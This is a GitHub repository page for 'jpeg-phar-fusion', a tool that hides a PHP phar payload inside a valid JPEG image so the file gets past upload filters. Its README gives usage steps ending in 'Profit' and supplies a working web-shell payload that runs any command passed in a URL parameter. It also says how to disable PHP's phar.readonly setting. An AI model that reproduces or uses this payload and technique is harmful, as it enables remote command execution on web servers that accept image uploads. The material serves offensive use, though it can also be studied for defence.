Skip to content
/ jpeg-phar-fusion Public

Basic script to get a phar payload in a valid jpeg image

4 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Sarapuce/jpeg-phar-fusion

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
.gitignore
.gitignore
 
 
README.md
README.md
 
 
fusion.jpeg
fusion.jpeg
 
 
include.php
include.php
 
 
phar_creator.py
phar_creator.py
 
 
phar_generator.php
phar_generator.php
 
 
tiny.jpg
tiny.jpg
 
 

Repository files navigation

JPEG PHAR Fusion

Very cool picture

This is a simple tool to add a phar payload at the end of a valid jpeg image.

Requierments

  • Python 3
  • Php (Tested with php 8)

Usage

  1. Clone the repo

git clone https://github.com/Sarapuce/jpeg-phar-fusion.git

  1. Choose a php payload finishing by __HALT_COMPILER(); for example :

<?php system($_GET["cmd"]); __HALT_COMPILER(); ?>

  1. Create the payload with the script

python3 phar_creator.py '<?php system($_GET["cmd"]); __HALT_COMPILER(); ?>'

  1. The file is in payload.jpg

  2. Profit

It doesn't work 😡

Do you have the error

PHP Fatal error: Uncaught UnexpectedValueException: creating archive "payload.phar" disabled by the php.ini setting phar.readonly

You need to enable the phar creation in php.ini

To locate your php.ini

php --ini

Then edit this line in your file

;phar.readonly = Off

into

phar.readonly = Off

About

Basic script to get a phar payload in a valid jpeg image

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages